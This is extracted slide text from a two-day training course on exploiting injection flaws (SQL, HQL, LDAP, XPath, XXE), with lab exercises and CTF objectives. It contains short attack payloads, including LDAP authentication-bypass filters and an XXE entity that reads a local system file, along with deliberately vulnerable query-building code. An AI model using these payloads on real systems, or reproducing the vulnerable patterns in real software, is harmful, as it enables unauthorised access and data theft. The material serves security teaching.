The Art Of Exploiting Injection FlawsSumit Siddharthsid@notsosecure.com

About the course

Hands on 2 days trainingRequire out of box thinking (strong coffee

recommended!)20 exercises, 100 slides, 8 CTFs!Previous feedback:

“ This was the best course I have ever been on. Since attending the course, I have identified so many issues which automated tools have missed. Thanks a ton, Sid”

“I have been pentesting for 4 years now, and thought I knew all about SQLI. I guess I was wrong. If anyone knows this subject well, it is Sid”

About Me

Sumit “sid” Siddharth Speaker/Trainer at Black Hat, Def con,

OWASP Appsec, HITB, Ruxcon etc

My blog: www.notsosecure.com

Specialist in Application & Database Security!

More than 8 years of Pentesting!

Co-author: SQL Injection, attacks and defense

Head of Penetration testing@7Safe

Day 1: SQL Injection

Exploiting SQL Injections

Authentication Bypass Extracting Data

Error Message Enabled Error Message Disabled

Union Injection Blind Injection Time Delays Out Of Band Channels

Privilege Escalation OS code execution

Exercise 9.8 – SQL Injection: OS command execution

http://hacklab.net/hackme_7.5/

Objective Exploit SQL injection to run OS commands on the

database server CTF : What are the contents of C:\secret.txt on the

server

Time 10 mins

Advanced SQL Injection

Insanely Blind SQL Injection Application returns same response Injection point in INSERT/UPDATE statement

Encoding/Decoding User Input

Base64 decoding user inputHex decoding user inputReal world examples

WordPress Admin-Ajax.php unauthenticated SQL injection

PHP-Nuke auth.php

$cookie=explode(‘;’, urldecode(empty($_POST[‘cookie’])))

$admin=base64_decode($admin)

SQL Injection in SQL Names

Consider the following:

Dim cat, orderBy, querycat = Replace(Request.Form(“cat”), “’”, “’’”)orderBy = Replace(Request.Form(“orderBy”), “’”,

“’’”)query = “SELECT * FROM prod WHERE cat = ‘” & cat &

“’ ORDER BY “ & orderBy

Hacking Oracle from Web

Exploiting SQL Injection against oracle database How to extract data

One Query to get them all! How to execute OS code What if we are not DBA

Become DBA Execute OS code Drop DBA

Capture The Flag: SQL Injection

http://hacklab.net/ctf.asp?data=foobar Objective• What’s in C:\secret.txtTime

20 Mins!No instructions or hints this time!

Day 2: The Art of Exploiting Lesser Known

Injection Flaws

ORM InjectionLDAP InjectionAdvanced LDAP InjectionXPath InjectionXpath v2XML Entity InjectionCombining Xpath and XXECTFQ&A

Hibernate Query Language Injection

User’s input to be passed directly to the underlying SQL engine

List<Event> result = session.createQuery("from Event e where e.title='" + param + "'").list();

HACKING LDAP

LDAP overview

LDAP injection

Blind LDAP injection

Hacking LDAP in practice

Securing Applications Against LDAP Injections

LDAP Injection: Authentication Bypass

(&(user=username)(password=pwd)) Usually password is hashed and then matched

with the stored value Injection is most likely to work only in username

field

(&(user=username)(password=*))(&(user=username)(&))

(password=pwd))Anything after first filter will be ignored by OpenLDAP

Exercise 6

http://hacklab2.net:81/ldap/selfservice/PHP/LDAPFind the telephone number of employee

Eric PhilipTime: 10 mins

XPATH Injection

Agenda What is XPATH Exploiting XPATH Impact of XPATH exploitation Blind XPATH Injection Automating XPATH Injection XPATH v2 injection Insane XPATH Injection Defending against XPATH Injection

XPATH’s XML Nomenclature

Root node

Comment

Node name

Attribute value

Node

Node value

Attribute name

Node

Automating Xpath

XPATH ExplorerDemo time!

Hugely increased feature set Regular expressions Unicode normalization String to code point conversion Remote document references

All of these can be utilised to speed up document retrieval and reduce the key space we have to search.

XPath 2.0 Features..

XPATH 2.0

Allows to not just read the current XML file but any arbitrary xml file on the file system.

Hacking Web Services with XML External Entity

Not validating the xml files before processing it

Attacker can inject an external entity <!ENTITY pwned SYSTEM "file:///c:/boot.ini" >

Web service parse the entity and the parser access the local resource Unauthorized access to information Post scanning Denial of service attack

Breaking the xml syntax Providing files like /dev/urandom

Combining XXE and Xpath

Did I say, with Xpath 2.0 you can read arbitrary xml files on the file system.

I actually mean: with Xpath 2.0 you can read arbitrary xml files on the

file system. Introducing Xcat

Thank You!

Questions please...Sid@notsosecure.comTwitter: notsosecure